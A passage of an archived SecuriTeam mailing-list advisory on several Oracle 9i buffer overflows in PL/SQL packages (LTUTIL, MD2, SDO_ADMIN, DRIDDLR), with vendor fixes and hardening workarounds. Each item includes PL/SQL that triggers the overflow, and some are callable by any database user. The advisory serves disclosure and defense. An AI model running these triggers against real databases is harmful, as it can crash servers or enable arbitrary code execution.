To reproduce the overflow, execute the next PL/SQL:
DECLARE
P_REPGRPNAME VARCHAR2(32767);
AAA VARCHAR2(32767);
BEGIN
AAA:='A';
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA || AAA;
P_REPGRPNAME := AAA;
SYS.LTUTIL.PUSHDEFERREDTXNS(REPGRPNAME => P_REPGRPNAME);
END;
Analysis:
This vulnerability can be exploited by members of WMSYS or SYSDBA role and
users granted execute permissions on LTUTIL package.
Exploitation of this vulnerability allows an attacker to execute arbitrary
code. It can also be exploited to cause DOS (Denial of service) killing
Oracle server process.
Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.
#41 - Buffer overflow in public procedure SDO_CODE_SIZE of MD2 package
Details:
When SDO_CODE_SIZE procedure is called with a long string in the LAYER
parameter a buffer overflow occurs.
To reproduce the overflow, execute the next PL/SQL:
DECLARE a BINARY_INTEGER; -- return value
BEGIN
a := MDSYS.MD2.SDO_CODE_SIZE (LAYER => 'longstring');
END;
Analysis:
By default SDO_CODE_SIZE has EXECUTE permission to PUBLIC so any Oracle
database user can exploit this vulnerability.
Exploitation of this vulnerability allows an attacker to execute arbitrary
code. It can also be exploited to cause DOS (Denial of service) killing
Oracle server process.
Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). Fixed in 10g (10.1.0.2) Patch 2.
#42 - Buffer overflow in public procedure VALIDATE_GEOM of MD2 package
Details:
When VALIDATE_GEOM procedure is called with a long string in the LAYER
parameter a buffer overflow occurs.
To reproduce the overflow, execute the next PL/SQL:
DECLARE a VARCHAR2(32767); -- return value
BEGIN
a := MDSYS.MD2.VALIDATE_GEOM (LAYER => 'longstring', GID => 1, ESEQ => 1);
END;
Analysis:
By default VALIDATE_GEOM has EXECUTE permission to PUBLIC so any Oracle
database user can exploit this vulnerability.
Exploitation of this vulnerability allows an attacker to execute arbitrary
code. It can also be exploited to cause DOS (Denial of service) killing
Oracle server process.
Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). Fixed in 10g (10.1.0.2) Patch 2.
#43 - Buffer overflow in public procedure SDO_CODE_SIZE of SDO_ADMIN
package
Details:
When SDO_CODE_SIZE procedure is called with a long string in the LAYER
parameter a buffer overflow occurs.
To reproduce the overflow, execute the next PL/SQL:
DECLARE a BINARY_INTEGER; -- return value
BEGIN
a := MDSYS.SDO_ADMIN.SDO_CODE_SIZE (LAYER => 'longstring');
END;
Analysis:
By default SDO_CODE_SIZE has EXECUTE permission to PUBLIC so any Oracle
database user can exploit this vulnerability.
Exploitation of this vulnerability allows an attacker to execute arbitrary
code. It can also be exploited to cause DOS (Denial of service) killing
Oracle server process.
Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). Fixed in 10g (10.1.0.2) Patch 2.
#44 - Buffer overflow in procedure SUBINDEXPOPULATE of DRIDDLR package
Details:
When SUBINDEXPOPULATE procedure is called with a long string in the
LOGFILE parameter a buffer overflow occurs.
To reproduce the overflow, execute the next PL/SQL:
DECLARE
P_INDEXID NUMBER;
P_SLAVEID NUMBER;
P_OPCODE NUMBER;
P_LOGFILE VARCHAR2(32767);
P_IDXMEM NUMBER;
AAA VARCHAR2(32767);
BEGIN
AAA:='A';
AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
P_INDEXID := 1;
P_SLAVEID := 1;
P_OPCODE := 1;
P_LOGFILE := AAA;
P_IDXMEM := 1;
CTXSYS.DRIDDLR.SUBINDEXPOPULATE(INDEXID => P_INDEXID, SLAVEID =>
P_SLAVEID, OPCODE => P_OPCODE, LOGFILE => P_LOGFILE, IDXMEM => P_IDXMEM);
END;
Analysis:
This vulnerability can be exploited by members of SYSDBA role and users
granted execute permissions on DRIDDLR package.
Exploitation of this vulnerability allows an attacker to execute arbitrary
code. It can also be exploited to cause DOS (Denial of service) killing
Oracle server process.
Vendor Fix:
Fixed in Patchset 4 (9.2.0.5) Patch 3. 10g Release 1 not vulnerable.
Comments:
Exploitation of these vulnerabilities will allow an attacker to completely
compromise the OS and the database if Oracle is running on Windows
platform, because Oracle must run under the local System account or under
an administrative account. If Oracle is running on *nix then only the
database would be compromised because Oracle runs mostly under oracle user
which has restricted permissions.
Workaround:
* Check packages permissions and remove public permissions. Set minimal
permissions that fit your needs
* Restrict users to execute PL/SQL statements directly over the server
* Periodically audit user permissions on all database objects
* Lock users that aren't used
* Change default passwords
* Keep Oracle up to date with patches
Vendor Contact:
Vendor was contacted and has released fixes. Please click on each
vulnerability to see details.
Solution:
For additional information, the official advisory from Oracle Corporation
can be downloaded from:
<http://www.oracle.com/technology/deploy/security/pdf/2004alert68.pdf>
http://www.oracle.com/technology/deploy/security/pdf/2004alert68.pdf
ADDITIONAL INFORMATION
The information has been provided by <mailto:shatter@appsecinc.com> Cesar
Cerrudo and Esteban Martinez Fayo of Application Security, Inc.
The original article can be found at:
<http://www.appsecinc.com/resources/alerts/oracle/2004-0001/>
http://www.appsecinc.com/resources/alerts/oracle/2004-0001/
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NT] Chat Anywhere DoS"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- Switch Off Multiple Vulnerabilities
... Stack-based Buffer Overflow ... execute arbitrary code on the remote
system - possibly with SYSTEM ... cause the server to execute a specially crafted request
which will trigger ... vulnerability before such code is made public, ... (Bugtraq) - [VulnWatch] Switch Off Multiple Vulnerabilities
... Stack-based Buffer Overflow ... execute arbitrary code on the remote
system - possibly with SYSTEM ... cause the server to execute a specially crafted request
which will trigger ... vulnerability before such code is made public, ... (VulnWatch) - SUSE Security Announcement: lftp (SuSE-SA:2003:051)
... When using lftp via HTTP or HTTPS to execute commands like 'ls' or 'rels' ...
Pending vulnerabilities in SUSE Distributions and Workarounds: ... Two vulnerabilities
were found in the FreeRADIUS package. ... The other bug is a remote buffer overflow
in the module rlm_smb. ... (Bugtraq) - [Full-Disclosure] SUSE Security Announcement: lftp (SuSE-SA:2003:051)
... When using lftp via HTTP or HTTPS to execute commands like 'ls' or 'rels' ...
Pending vulnerabilities in SUSE Distributions and Workarounds: ... Two vulnerabilities
were found in the FreeRADIUS package. ... The other bug is a remote buffer overflow
in the module rlm_smb. ... (Full-Disclosure) - [PLSN-0003] - Remote exploits in mplayer
... Peachtree Linux Security Notice PLSN-0003 ... A buffer overflow vulnerability
exists in the RTSP stream module, ... which could allow malicious servers of MMS or TCP streams
to execute ... Download the appropriate package for your release of Peachtree Linux.
... (Bugtraq)
